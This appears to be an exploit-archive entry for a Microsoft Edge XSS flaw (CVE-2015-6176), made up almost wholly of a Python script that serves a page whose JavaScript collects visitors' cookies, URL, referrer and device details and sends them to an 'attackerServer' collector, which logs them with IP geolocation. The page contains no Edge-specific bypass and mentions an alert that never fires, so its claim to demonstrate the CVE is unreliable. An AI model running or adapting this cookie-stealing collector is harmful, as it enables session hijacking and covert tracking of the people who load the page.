Microsoft Edge Windows 10 Version 1511 - Cross Site Scripting (XSS)

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203

#!/usr/bin/python
# nu11secur1ty CVE-2015-6176

import http.server
import socketserver
import socket
import threading
from urllib import parse
import requests
import datetime

PORT = 8080
COLLECTOR_PORT = 9000

# 包含扩展XSS利用的HTML页面，通过Image GET向收集器发送大量信息
HTML_CONTENT = b"""<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8" />
<title>XSS Edge Bypass PoC</title>
<script>
window.onload = function() {
    try {
        var attackerServer = "http://{LOCAL_IP}:{COLLECTOR_PORT}/collect";
        var cookies = document.cookie || "";
        var url = window.location.href;
        var referrer = document.referrer;
        var language = navigator.language || "";
        var platform = navigator.platform || "";
        var timezone = Intl.DateTimeFormat().resolvedOptions().timeZone || "";
        var screenRes = screen.width + "x" + screen.height;

        var data = {
            cookie: cookies,
            url: url,
            referrer: referrer,
            language: language,
            platform: platform,
            timezone: timezone,
            screen: screenRes
        };

        var query = Object.keys(data).map(function(k) {
            return encodeURIComponent(k) + "=" + encodeURIComponent(data[k]);
        }).join("&");

        var img = new Image();
        img.src = attackerServer + "?" + query;
    } catch(e) {
        console.error("Error sending data:", e);
    }
};
</script>
</head>
<body>
<h1 style="color:red;">XSS Edge Bypass PoC</h1>
<p>If this alert appears, XSS is executed.</p>
</body>
</html>
"""

# 收集器页面，包含大海图片和居中消息（支持Unicode）
COLLECTOR_PAGE = """<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8" />
<title>Collected</title>
<style>
  body {
    margin: 0;
    background: url('https://images.unsplash.com/photo-1506744038136-46273834b3fb?auto=format&fit=crop&w=1350&q=80') no-repeat center center fixed;
    background-size: cover;
    height: 100vh;
    display: flex;
    justify-content: center;
    align-items: center;
    color: white;
    font-family: Arial, sans-serif;
    font-size: 2em;
    text-shadow: 2px 2px 5px rgba(0,0,0,0.7);
  }
</style>
</head>
<body>
<div>Thank you for visiting the collector page </div>
</body>
</html>
"""

class ExploitHandler(http.server.SimpleHTTPRequestHandler):
    def do_GET(self):
        if self.path in ('/', '/index.html'):
            content = HTML_CONTENT.replace(b"{LOCAL_IP}", local_ip.encode()).replace(b"{COLLECTOR_PORT}", str(COLLECTOR_PORT).encode())
            self.send_response(200)
            self.send_header("Content-Type", "text/html; charset=utf-8")
            self.send_header("Content-Length", str(len(content)))
            self.end_headers()
            self.wfile.write(content)
        else:
            self.send_error(404)

class CollectorHandler(http.server.BaseHTTPRequestHandler):
    def do_GET(self):
        parsed_path = parse.urlparse(self.path)
        if parsed_path.path == "/collect":
            query = parse.parse_qs(parsed_path.query)

            cookie = query.get("cookie", [""])[0]
            url = query.get("url", [""])[0]
            referrer = query.get("referrer", [""])[0]
            language = query.get("language", [""])[0]
            platform = query.get("platform", [""])[0]
            timezone = query.get("timezone", [""])[0]
            screen = query.get("screen", [""])[0]

            ip = self.client_address[0]
            user_agent = self.headers.get("User-Agent", "Unknown")
            timestamp = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")

            location = self.get_location(ip)

            if cookie:
                print(f"[{timestamp}] [+] Collected cookie: {cookie}")
            print(f"    URL: {url}")
            print(f"    Referrer: {referrer}")
            print(f"    Language: {language}")
            print(f"    Platform: {platform}")
            print(f"    Timezone: {timezone}")
            print(f"    Screen Resolution: {screen}")
            print(f"    From IP: {ip}")
            print(f"    User-Agent: {user_agent}")
            print(f"    Location: {location}")
            print("-" * 50)

            # 将收集的信息保存到文件
            with open("collected_data.log", "a", encoding="utf-8") as f:
                f.write(f"[{timestamp}] Cookie: {cookie}\n")
                f.write(f"    URL: {url}\n")
                f.write(f"    Referrer: {referrer}\n")
                f.write(f"    Language: {language}\n")
                f.write(f"    Platform: {platform}\n")
                f.write(f"    Timezone: {timezone}\n")
                f.write(f"    Screen Resolution: {screen}\n")
                f.write(f"    IP: {ip}\n")
                f.write(f"    User-Agent: {user_agent}\n")
                f.write(f"    Location: {location}\n")
                f.write("-" * 50 + "\n")

            self.send_response(200)
            self.send_header("Content-Type", "text/html; charset=utf-8")
            content = COLLECTOR_PAGE.encode('utf-8')
            self.send_header("Content-Length", str(len(content)))
            self.end_headers()
            self.wfile.write(content)
        else:
            self.send_error(404)

    def get_location(self, ip):
        # 使用免费IP信息服务；如果没有网络连接则优雅降级
        try:
            resp = requests.get(f"https://ipinfo.io/{ip}/json", timeout=3)
            if resp.status_code == 200:
                data = resp.json()
                city = data.get("city", "")
                region = data.get("region", "")
                country = data.get("country", "")
                loc = data.get("loc", "")
                return f"{city}, {region}, {country} (coords: {loc})"
        except Exception:
            pass
        return "Location lookup failed or unavailable"

def get_local_ip():
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    try:
        s.connect(("8.8.8.8", 80))
        ip = s.getsockname()[0]
    except Exception:
        ip = "127.0.0.1"
    finally:
        s.close()
    return ip

def run_exploit_server():
    with socketserver.TCPServer(("", PORT), ExploitHandler) as httpd:
        print(f"[*] Exploit server running at: http://{local_ip}:{PORT}/index.html")
        httpd.serve_forever()

def run_collector_server():
    with socketserver.TCPServer(("", COLLECTOR_PORT), CollectorHandler) as httpd:
        print(f"[*] Collector server listening for stolen cookies at: http://{local_ip}:{COLLECTOR_PORT}/collect")
        httpd.serve_forever()

if __name__ == "__main__":
    local_ip = get_local_ip()
    try:
        print(f"[*] Your server IP is: {local_ip}")
        exploit_thread = threading.Thread(target=run_exploit_server, daemon=True)
        exploit_thread.start()

        run_collector_server()
    except KeyboardInterrupt:
        print("\n[!] Shutting down servers. Goodbye!")